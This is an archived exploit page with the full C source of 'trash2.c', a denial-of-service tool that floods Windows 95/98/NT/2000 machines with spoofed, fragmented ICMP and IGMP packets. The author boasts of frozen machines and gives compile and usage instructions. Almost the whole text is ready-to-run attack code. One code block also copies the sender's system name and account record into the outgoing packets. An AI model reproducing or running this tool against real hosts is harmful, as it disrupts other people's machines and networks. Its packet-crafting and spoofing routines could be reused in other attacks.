Denial of service attack against Windows98/95/2000/NT Machines. Sends random, spoofed ICMP/IGMP packets with random spoofed source addresses, resulting in the users machine freezing or CPU usage will shoot though the roof.
8b59e70738fabd2511fca7885ad38fbe690680de6962a4f3205f1a6864a4d568/* Complex denial of service attack against Windows98/95/2000/NT Machines
Overview: sends random, spoofed, ICMP/IGMP packets with random spoof source
Result: Freezes the users machine or a CPU usage will rise to extreme
lag. tested on:
2.0.35
2.2.5-15
2.2.9
2.0.36
From a 56k I killed 2/5 Win/NT Box's, 5/5 Win98, 4/6 Win95.
And those who didn't die, they where lagged to hell...
You may freely alter this code, but give credit where credit is due
gcc -o trash2 trash2.c will do fine...
e-mail leet@ibw.com.ni for any questions.
*/
/* greets go out to:
bombfirst, L^Warrior, codesearc, Asphyx, killtron, ^S|lver, randip(); fucntion stolen from kox.c
acidspill, glock24, p0larbear, xjust, bxj2k, JUSTaGIRL [you know who you are]
Drth_Maul,everyone in #bitchx@unet, #outlaw@unet, #slackware@unet, #kernel@unet
[outlaw]
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <pwd.h>
#include <time.h>
#include <sys/utsname.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>
void banner(void) {
printf("trash2.c - misteri0@unet [outlaw]\n\n");
printf("\n\n");
}
void usage(const char *progname) {
printf("usage:\n");
printf("./trash [dst_ip] [# of packets]\n",progname);
printf("\t[*] [ip_dst] : ex: 201.12.3.76\n");
printf("\t[*] [number] : 100\n");
printf("\t-----------------------------------------\n");
}
unsigned int randip()
{
struct hostent *he;
struct sockaddr_in sin;
char *buf = (char *)calloc(1, sizeof(char) * 16);
sprintf(buf, "%d.%d.%d.%d",
(random()%191)+23,
(random()%253)+1,
(random()%253)+1,
(random()%253)+1);
inet_aton(buf, (struct in_addr *)&sin);
return sin.sin_addr.s_addr;
}
int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {
struct hostent *host;
memset(addr,0,sizeof(struct sockaddr_in));
addr->sin_family = AF_INET;
addr->sin_addr.s_addr = inet_addr(name);
if (addr->sin_addr.s_addr == -1) {
if (( host = gethostbyname(name) ) == NULL ) {
fprintf(stderr,"ERROR: Unable to resolve host %s\n",name);
return(-1);
}
addr->sin_family = host->h_addrtype;
memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
}
addr->sin_port = htons(port);
return(0);
}
unsigned short in_cksum(addr, len)
u_short *addr;
int len;
{
register int nleft = len;
register u_short *w = addr;
register int sum = 0;
u_short answer = 0;
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}
if (nleft == 1) {
*(u_char *)(&answer) = *(u_char *)w ;
sum += answer;
}
sum = (sum >> 16) + (sum & 0xffff);
sum += (sum >> 16);
answer = ~sum;
return(answer);
}
int sendwin98bug(struct sockaddr_in *victim, unsigned long spoof)
{
int BIGIGMP = 1500;
unsigned char *pkt;
struct iphdr *ip;
struct igmphdr *igmp;
struct utsname *un;
struct passwd *p;
int i, s;
int id = (random() % 40000) + 500;
pkt = (unsigned char *)calloc(1, BIGIGMP);
ip = (struct iphdr *)pkt;
igmp = (struct igmphdr *)(pkt + sizeof(struct iphdr));
ip->version = 4;
ip->ihl = (sizeof *ip) / 4;
ip->ttl = 255;
ip->tot_len = htons(BIGIGMP);
ip->protocol = IPPROTO_IGMP;
ip->id = htons(id);
ip->frag_off = htons(IP_MF);
ip->saddr = spoof;
ip->daddr = victim->sin_addr.s_addr;
ip->check = in_cksum((unsigned short *)ip, sizeof(struct iphdr));
igmp->type = 0;
igmp->group = 0;
igmp->csum = in_cksum((unsigned short *)igmp, sizeof(struct igmphdr));
for(i = sizeof(struct iphdr) + sizeof(struct igmphdr) + 1;
i < BIGIGMP; i++)
pkt[i] = random() % 255;
#ifndef I_GROK
un = (struct utsname *)(pkt + sizeof(struct iphdr) +
sizeof(struct igmphdr) + 40);
uname(un);
p = (struct passwd *)((void *)un + sizeof(struct utsname) + 10);
memcpy(p, getpwuid(getuid()), sizeof(struct passwd));
#endif
if((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
perror("error: socket()");
return 1;
}
if(sendto(s, pkt, BIGIGMP, 0, victim,
sizeof(struct sockaddr_in)) == -1) {
perror("error: sendto()");
return 1;
}
/* usleep(1000000); */
for(i = 1; i < 5; i++) {
if(i > 3)
ip->frag_off = htons(((BIGIGMP-20) * i) >> 3);
else
ip->frag_off = htons(((BIGIGMP-20) * i) >> 3 | IP_MF);
sendto(s, pkt, BIGIGMP, 0, victim, sizeof(struct sockaddr_in));
/* usleep(2000000); */
}
free(pkt);
close(s);
return 0;
}
int send_winbomb(int socket,
unsigned long spoof_addr,
struct sockaddr_in *dest_addr) {
unsigned char *packet;
struct iphdr *ip;
struct icmphdr *icmp;
int rc;
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct icmphdr) + 8);
ip = (struct iphdr *)packet;
icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
ip->ihl = 5;
ip->version = 4;
// ip->tos = 2;
ip->id = htons(1234);
ip->frag_off |= htons(0x2000);
// ip->tot_len = 0;
ip->ttl = 30;
ip->protocol = IPPROTO_ICMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum(ip, sizeof(struct iphdr));
icmp->type = rand() % 15;
icmp->code = rand() % 15;
icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1);
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + 1,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
ip->frag_off = htons(8 >> 3);
ip->frag_off |= htons(0x2000);
ip->check = in_cksum(ip, sizeof(struct iphdr));
icmp->type = rand() % 15;
icmp->code = rand() % 15;
icmp->checksum = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct icmphdr) + 8,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
return(0);
}
int send_igmp(int socket,
unsigned long spoof_addr,
struct sockaddr_in *dest_addr) {
unsigned char *packet;
struct iphdr *ip;
struct igmphdr *igmp;
int rc;
packet = (unsigned char *)malloc(sizeof(struct iphdr) +
sizeof(struct igmphdr) + 8);
ip = (struct iphdr *)packet;
igmp = (struct igmphdr *)(packet + sizeof(struct iphdr));
memset(ip,0,sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
ip->ihl = 5;
ip->version = 4;
ip->id = htons(34717);
ip->frag_off = htons(0x2000);
ip->ttl = 255;
ip->protocol = IPPROTO_IGMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum(ip, sizeof(struct iphdr));
igmp->type = 8;
igmp->code = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct igmphdr) + 1,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
ip->frag_off = htons(8 >> 3);
ip->version = 4;
ip->id = htons(34717);
ip->frag_off |= htons(0x2000);
ip->ttl = 255;
ip->protocol = IPPROTO_IGMP;
ip->saddr = spoof_addr;
ip->daddr = dest_addr->sin_addr.s_addr;
ip->check = in_cksum(ip, sizeof(struct iphdr));
igmp->type = 8;
igmp->code = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct igmphdr) + 1,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
ip->tot_len = htons(sizeof(struct iphdr) + sizeof(struct igmphdr) + 8);
ip->frag_off = htons(8 >> 3);
ip->frag_off |= htons(0x2000);
ip->check = in_cksum(ip, sizeof(struct iphdr));
igmp->type = 0;
igmp->code = 0;
if (sendto(socket,
packet,
sizeof(struct iphdr) +
sizeof(struct igmphdr) + 8,0,
(struct sockaddr *)dest_addr,
sizeof(struct sockaddr)) == -1) { return(-1); }
free(packet);
return(0);
}
int main(int argc, char **argv) {
struct sockaddr_in dest_addr;
unsigned int i,sock;
unsigned long src_addr;
banner();
if ((argc != 3)) {
usage(argv[0]);
return(-1);
}
if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
fprintf(stderr,"ERROR: Opening raw socket.\n");
return(-1);
}
/* if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); } */
src_addr = dest_addr.sin_addr.s_addr;
if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
printf("Status: Connected....packets sent.\n",argv[0]);
for (i = 0;i < atoi(argv[2]);i++) {
if (send_winbomb(sock,randip(),&dest_addr) == -1 || send_igmp(sock,randip(),&dest_addr) == -1 || sendwin98bug(&dest_addr, randip()) ) {
fprintf(stderr,"ERROR: Unable to Connect To host.\n");
return(-1);
}
usleep(10000);
}
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed